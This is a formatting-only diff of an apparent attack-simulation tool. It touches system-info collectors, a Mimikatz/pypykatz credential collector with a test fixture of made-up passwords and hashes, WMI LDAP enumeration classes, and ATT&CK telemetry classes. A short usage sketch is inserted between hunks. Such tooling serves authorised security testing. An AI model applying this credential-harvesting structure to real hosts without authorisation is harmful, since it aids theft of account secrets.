info = {"instance_id":aws.get_instance_id()}
else:
logger.info("Machine is NOT an AWS instance")

View File

@ -21,4 +21,4 @@ class EnvironmentCollector(SystemInfoCollector):
super().__init__(name=ENVIRONMENT_COLLECTOR)
def collect(self) -> dict:
return {"environment": get_monkey_environment()}
return {"environment":get_monkey_environment()}

View File

@ -12,4 +12,4 @@ class HostnameCollector(SystemInfoCollector):
super().__init__(name=HOSTNAME_COLLECTOR)
def collect(self) -> dict:
return {"hostname": socket.getfqdn()}
return {"hostname":socket.getfqdn()}

View File

@ -30,22 +30,23 @@ class ProcessListCollector(SystemInfoCollector):
for process in psutil.process_iter():
try:
processes[process.pid] = {
"name": process.name(),
"pid": process.pid,
"ppid": process.ppid(),
"cmdline": " ".join(process.cmdline()),
"full_image_path": process.exe(),
"name":process.name(),
"pid":process.pid,
"ppid":process.ppid(),
"cmdline":" ".join(process.cmdline()),
"full_image_path":process.exe(),
}
except (psutil.AccessDenied, WindowsError):
# we may be running as non root and some processes are impossible to acquire in Windows/Linux.
# we may be running as non root and some processes are impossible to acquire in
# Windows/Linux.
# In this case we'll just add what we know.
processes[process.pid] = {
"name": "null",
"pid": process.pid,
"ppid": process.ppid(),
"cmdline": "ACCESS DENIED",
"full_image_path": "null",
"name":"null",
"pid":process.pid,
"ppid":process.ppid(),
"cmdline":"ACCESS DENIED",
"full_image_path":"null",
}
continue
return {"process_list": processes}
return {"process_list":processes}

View File

@ -1,4 +1,5 @@
# Inspired by Giampaolo Rodola's psutil example from https://github.com/giampaolo/psutil/blob/master/scripts/netstat.py
# Inspired by Giampaolo Rodola's psutil example from
# https://github.com/giampaolo/psutil/blob/master/scripts/netstat.py
import logging
import socket
@ -19,10 +20,10 @@ class NetstatCollector(object):
AF_INET6 = getattr(socket, "AF_INET6", object())
proto_map = {
(AF_INET, SOCK_STREAM): "tcp",
(AF_INET6, SOCK_STREAM): "tcp6",
(AF_INET, SOCK_DGRAM): "udp",
(AF_INET6, SOCK_DGRAM): "udp6",
(AF_INET, SOCK_STREAM):"tcp",
(AF_INET6, SOCK_STREAM):"tcp6",
(AF_INET, SOCK_DGRAM):"udp",
(AF_INET6, SOCK_DGRAM):"udp6",
}
@staticmethod
@ -33,11 +34,11 @@ class NetstatCollector(object):
@staticmethod
def _parse_connection(c):
return {
"proto": NetstatCollector.proto_map[(c.family, c.type)],
"local_address": c.laddr[0],
"local_port": c.laddr[1],
"remote_address": c.raddr[0] if c.raddr else None,
"remote_port": c.raddr[1] if c.raddr else None,
"status": c.status,
"pid": c.pid,
"proto":NetstatCollector.proto_map[(c.family, c.type)],
"local_address":c.laddr[0],
"local_port":c.laddr[1],
"remote_address":c.raddr[0] if c.raddr else None,
"remote_port":c.raddr[1] if c.raddr else None,
"status":c.status,
"pid":c.pid,
}
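A hedged usage sketch of the proto_map above: psutil.net_connections() returns one entry per socket, and the (family, type) pair indexes the map to label it tcp/tcp6/udp/udp6, much as _parse_connection does; field handling here is simplified.

import socket
import psutil

proto_map = {
    (socket.AF_INET, socket.SOCK_STREAM): "tcp",
    (socket.AF_INET6, socket.SOCK_STREAM): "tcp6",
    (socket.AF_INET, socket.SOCK_DGRAM): "udp",
    (socket.AF_INET6, socket.SOCK_DGRAM): "udp6",
}

def netstat_info():
    return [
        {
            "proto": proto_map[(c.family, c.type)],
            "local_address": c.laddr[0] if c.laddr else None,
            "local_port": c.laddr[1] if c.laddr else None,
            "status": c.status,
            "pid": c.pid,
        }
        for c in psutil.net_connections(kind="inet")
    ]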

View File

@ -7,9 +7,12 @@ from infection_monkey.utils.plugins.plugin import Plugin
class SystemInfoCollector(Plugin, metaclass=ABCMeta):
"""
ABC for system info collection. See system_info_collector_handler for more info. Basically, to implement a new system info
collector, inherit from this class in an implementation in the infection_monkey.system_info.collectors class, and override
the 'collect' method. Don't forget to parse your results in the Monkey Island and to add the collector to the configuration
ABC for system info collection. See system_info_collector_handler for more info. Basically,
to implement a new system info
collector, inherit from this class in an implementation in the
infection_monkey.system_info.collectors class, and override
the 'collect' method. Don't forget to parse your results in the Monkey Island and to add the
collector to the configuration
as well - see monkey_island.cc.services.processing.system_info_collectors for examples.
See the Wiki page "How to add a new System Info Collector to the Monkey?" for a detailed guide.

View File

@ -24,12 +24,11 @@ class SystemInfoCollectorsHandler(object):
# If we failed one collector, no need to stop execution. Log and continue.
LOG.error("Collector {} failed. Error info: {}".format(collector.name, e))
LOG.info(
"All system info collectors executed. Total {} executed, out of which {} collected successfully.".format(
len(self.collectors_list), successful_collections
)
"All system info collectors executed. Total {} executed, out of which {} "
"collected successfully.".format(len(self.collectors_list), successful_collections)
)
SystemInfoTelem({"collectors": system_info_telemetry}).send()
SystemInfoTelem({"collectors":system_info_telemetry}).send()
@staticmethod
def config_to_collectors_list() -> Sequence[SystemInfoCollector]:

View File

@ -22,5 +22,5 @@ class MimikatzCredentialCollector(object):
# Let's not use "." and "$" in keys, because it will confuse mongo.
# Ideally we should refactor island not to use a dict and simply parse credential list.
key = cred.username.replace(".", ",").replace("$", "")
cred_dict.update({key: cred.to_dict()})
cred_dict.update({key:cred.to_dict()})
return cred_dict

View File

@ -8,119 +8,123 @@ from infection_monkey.system_info.windows_cred_collector.pypykatz_handler import
class TestPypykatzHandler(TestCase):
# Made up credentials, but structure of dict should be roughly the same
PYPYKATZ_SESSION = {
"authentication_id": 555555,
"session_id": 3,
"username": "Monkey",
"domainname": "ReAlDoMaIn",
"logon_server": "ReAlDoMaIn",
"logon_time": "2020-06-02T04:53:45.256562+00:00",
"sid": "S-1-6-25-260123139-3611579848-5589493929-3021",
"luid": 123086,
"msv_creds": [
"authentication_id":555555,
"session_id":3,
"username":"Monkey",
"domainname":"ReAlDoMaIn",
"logon_server":"ReAlDoMaIn",
"logon_time":"2020-06-02T04:53:45.256562+00:00",
"sid":"S-1-6-25-260123139-3611579848-5589493929-3021",
"luid":123086,
"msv_creds":[
{
"username": "monkey",
"domainname": "ReAlDoMaIn",
"NThash": b"1\xb7<Y\xd7\xe0\xc0\x89\xc01\xd6\xcf\xe0\xd1j\xe9",
"LMHash": None,
"SHAHash": b"\x18\x90\xaf\xd8\x07\t\xda9\xa3\xee^kK\r2U\xbf\xef\x95`",
"username":"monkey",
"domainname":"ReAlDoMaIn",
"NThash":b"1\xb7<Y\xd7\xe0\xc0\x89\xc01\xd6\xcf\xe0\xd1j\xe9",
"LMHash":None,
"SHAHash":b"\x18\x90\xaf\xd8\x07\t\xda9\xa3\xee^kK\r2U\xbf\xef\x95`",
}
],
"wdigest_creds": [
"wdigest_creds":[
{
"credtype": "wdigest",
"username": "monkey",
"domainname": "ReAlDoMaIn",
"password": "canyoufindme",
"luid": 123086,
"credtype":"wdigest",
"username":"monkey",
"domainname":"ReAlDoMaIn",
"password":"canyoufindme",
"luid":123086,
}
],
"ssp_creds": [
"ssp_creds":[
{
"credtype": "wdigest",
"username": "monkey123",
"domainname": "ReAlDoMaIn",
"password": "canyoufindme123",
"luid": 123086,
"credtype":"wdigest",
"username":"monkey123",
"domainname":"ReAlDoMaIn",
"password":"canyoufindme123",
"luid":123086,
}
],
"livessp_creds": [
"livessp_creds":[
{
"credtype": "wdigest",
"username": "monk3y",
"domainname": "ReAlDoMaIn",
"password": "canyoufindm3",
"luid": 123086,
"credtype":"wdigest",
"username":"monk3y",
"domainname":"ReAlDoMaIn",
"password":"canyoufindm3",
"luid":123086,
}
],
"dpapi_creds": [
"dpapi_creds":[
{
"credtype": "dpapi",
"key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid": 123086,
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
},
{
"credtype": "dpapi",
"key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid": 123086,
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
},
{
"credtype": "dpapi",
"key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid": 123086,
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
},
{
"credtype": "dpapi",
"key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid": 123086,
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
},
{"credtype": "dpapi", "key_guid": "9123-123ae123de4-121239-3123-421f"},
{"credtype":"dpapi", "key_guid":"9123-123ae123de4-121239-3123-421f"},
],
"kerberos_creds": [
"kerberos_creds":[
{
"credtype": "kerberos",
"username": "monkey_kerb",
"password": None,
"domainname": "ReAlDoMaIn",
"luid": 123086,
"tickets": [],
"credtype":"kerberos",
"username":"monkey_kerb",
"password":None,
"domainname":"ReAlDoMaIn",
"luid":123086,
"tickets":[],
}
],
"credman_creds": [
"credman_creds":[
{
"credtype": "credman",
"username": "monkey",
"domainname": "monkey.ad.monkey.com",
"password": "canyoufindme2",
"luid": 123086,
"credtype":"credman",
"username":"monkey",
"domainname":"monkey.ad.monkey.com",
"password":"canyoufindme2",
"luid":123086,
},
{
"credtype": "credman",
"username": "monkey@monkey.com",
"domainname": "moneky.monkey.com",
"password": "canyoufindme1",
"luid": 123086,
"credtype":"credman",
"username":"monkey@monkey.com",
"domainname":"moneky.monkey.com",
"password":"canyoufindme1",
"luid":123086,
},
{
"credtype": "credman",
"username": "test",
"domainname": "test.test.ts",
"password": "canyoufindit",
"luid": 123086,
"credtype":"credman",
"username":"test",
"domainname":"test.test.ts",
"password":"canyoufindit",
"luid":123086,
},
],
"tspkg_creds": [],
"tspkg_creds":[],
}
def test__get_creds_from_pypykatz_session(self):
@ -128,27 +132,27 @@ class TestPypykatzHandler(TestCase):
test_dicts = [
{
"username": "monkey",
"ntlm_hash": "31b73c59d7e0c089c031d6cfe0d16ae9",
"password": "",
"lm_hash": "",
"username":"monkey",
"ntlm_hash":"31b73c59d7e0c089c031d6cfe0d16ae9",
"password":"",
"lm_hash":"",
},
{"username": "monkey", "ntlm_hash": "", "password": "canyoufindme", "lm_hash": ""},
{"username":"monkey", "ntlm_hash":"", "password":"canyoufindme", "lm_hash":""},
{
"username": "monkey123",
"ntlm_hash": "",
"password": "canyoufindme123",
"lm_hash": "",
"username":"monkey123",
"ntlm_hash":"",
"password":"canyoufindme123",
"lm_hash":"",
},
{"username": "monk3y", "ntlm_hash": "", "password": "canyoufindm3", "lm_hash": ""},
{"username": "monkey", "ntlm_hash": "", "password": "canyoufindme2", "lm_hash": ""},
{"username":"monk3y", "ntlm_hash":"", "password":"canyoufindm3", "lm_hash":""},
{"username":"monkey", "ntlm_hash":"", "password":"canyoufindme2", "lm_hash":""},
{
"username": "monkey@monkey.com",
"ntlm_hash": "",
"password": "canyoufindme1",
"lm_hash": "",
"username":"monkey@monkey.com",
"ntlm_hash":"",
"password":"canyoufindme1",
"lm_hash":"",
},
{"username": "test", "ntlm_hash": "", "password": "canyoufindit", "lm_hash": ""},
{"username":"test", "ntlm_hash":"", "password":"canyoufindit", "lm_hash":""},
]
results = [result.to_dict() for result in results]
[self.assertTrue(test_dict in results) for test_dict in test_dicts]

View File

@ -10,8 +10,8 @@ class WindowsCredentials:
def to_dict(self) -> Dict:
return {
"username": self.username,
"password": self.password,
"ntlm_hash": self.ntlm_hash,
"lm_hash": self.lm_hash,
"username":self.username,
"password":self.password,
"ntlm_hash":self.ntlm_hash,
"lm_hash":self.lm_hash,
}

View File

@ -17,7 +17,7 @@ WMI_CLASSES = {
# monkey should run as *** SYSTEM *** !!!
#
WMI_LDAP_CLASSES = {
"ds_user": (
"ds_user":(
"DS_sAMAccountName",
"DS_userPrincipalName",
"DS_sAMAccountType",
@ -36,7 +36,7 @@ WMI_LDAP_CLASSES = {
"DS_logonCount",
"DS_accountExpires",
),
"ds_group": (
"ds_group":(
"DS_whenChanged",
"DS_whenCreated",
"DS_sAMAccountName",
@ -52,7 +52,7 @@ WMI_LDAP_CLASSES = {
"DS_distinguishedName",
"ADSIPath",
),
"ds_computer": (
"ds_computer":(
"DS_dNSHostName",
"ADSIPath",
"DS_accountExpires",

View File

@ -44,7 +44,8 @@ class WindowsSystemSingleton(_SystemSingleton):
if not handle:
LOG.error(
"Cannot acquire system singleton %r, unknown error %d", self._mutex_name, last_error
"Cannot acquire system singleton %r, unknown error %d", self._mutex_name,
last_error
)
return False
if winerror.ERROR_ALREADY_EXISTS == last_error:

View File

@ -18,4 +18,4 @@ class AttackTelem(BaseTelem):
telem_category = TelemCategoryEnum.ATTACK
def get_data(self):
return {"status": self.status.value, "technique": self.technique}
return {"status":self.status.value, "technique":self.technique}

View File

@ -15,5 +15,5 @@ class T1005Telem(AttackTelem):
def get_data(self):
data = super(T1005Telem, self).get_data()
data.update({"gathered_data_type": self.gathered_data_type, "info": self.info})
data.update({"gathered_data_type":self.gathered_data_type, "info":self.info})
return data

View File

@ -3,7 +3,8 @@ from infection_monkey.telemetry.attack.usage_telem import AttackTelem
class T1064Telem(AttackTelem):
def __init__(self, status, usage):
# TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem techniques
# TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem
# techniques
"""
T1064 telemetry.
:param status: ScanStatus of technique
@ -14,5 +15,5 @@ class T1064Telem(AttackTelem):
def get_data(self):
data = super(T1064Telem, self).get_data()
data.update({"usage": self.usage})
data.update({"usage":self.usage})
return data

View File

@ -17,5 +17,5 @@ class T1105Telem(AttackTelem):
def get_data(self):
data = super(T1105Telem, self).get_data()
data.update({"filename": self.filename, "src": self.src, "dst": self.dst})
data.update({"filename":self.filename, "src":self.src, "dst":self.dst})
return data

View File

@ -13,5 +13,5 @@ class T1107Telem(AttackTelem):
def get_data(self):
data = super(T1107Telem, self).get_data()
data.update({"path": self.path})
data.update({"path":self.path})
return data

View File

@ -5,7 +5,8 @@ __author__ = "itay.mizeretz"
class T1197Telem(VictimHostTelem):
def __init__(self, status, machine, usage):
# TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem techniques
# TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem
# techniques
"""
T1197 telemetry.
:param status: ScanStatus of technique
@ -17,5 +18,5 @@ class T1197Telem(VictimHostTelem):
def get_data(self):
data = super(T1197Telem, self).get_data()
data.update({"usage": self.usage})
data.update({"usage":self.usage})
return data

View File

@ -14,5 +14,5 @@ class T1222Telem(VictimHostTelem):
def get_data(self):
data = super(T1222Telem, self).get_data()
data.update({"command": self.command})
data.update({"command":self.command})
return data

View File

@ -13,5 +13,5 @@ class UsageTelem(AttackTelem):
def get_data(self):
data = super(UsageTelem, self).get_data()
data.update({"usage": self.usage})
data.update({"usage":self.usage})
return data

View File

@ -13,9 +13,9 @@ class VictimHostTelem(AttackTelem):
:param machine: VictimHost obj from model/host.py
"""
super(VictimHostTelem, self).__init__(technique, status)
self.machine = {"domain_name": machine.domain_name, "ip_addr": machine.ip_addr}
self.machine = {"domain_name":machine.domain_name, "ip_addr":machine.ip_addr}
def get_data(self):
data = super(VictimHostTelem, self).get_data()
data.update({"machine": self.machine})
data.update({"machine":self.machine})
return data

View File

@ -9,6 +9,7 @@ LOGGED_DATA_LENGTH = 300 # How many characters of telemetry data will be logged
__author__ = "itay.mizeretz"
# TODO: Rework the interface for telemetry; this class has too many responsibilities
# (i.e. too many reasons to change):
#

View File

@ -19,9 +19,9 @@ class ExploitTelem(BaseTelem):
def get_data(self):
return {
"result": self.result,
"machine": self.exploiter.host.__dict__,
"exploiter": self.exploiter.__class__.__name__,
"info": self.exploiter.exploit_info,
"attempts": self.exploiter.exploit_attempts,
"result":self.result,
"machine":self.exploiter.host.__dict__,
"exploiter":self.exploiter.__class__.__name__,
"info":self.exploiter.exploit_info,
"attempts":self.exploiter.exploit_attempts,
}

View File

@ -22,11 +22,11 @@ class PostBreachTelem(BaseTelem):
def get_data(self):
return {
"command": self.pba.command,
"result": self.result,
"name": self.pba.name,
"hostname": self.hostname,
"ip": self.ip,
"command":self.pba.command,
"result":self.result,
"name":self.pba.name,
"hostname":self.hostname,
"ip":self.ip,
}
@staticmethod

View File

@ -16,4 +16,4 @@ class ScanTelem(BaseTelem):
telem_category = TelemCategoryEnum.SCAN
def get_data(self):
return {"machine": self.machine.as_dict(), "service_count": len(self.machine.services)}
return {"machine":self.machine.as_dict(), "service_count":len(self.machine.services)}

Some files were not shown because too many files have changed in this diff.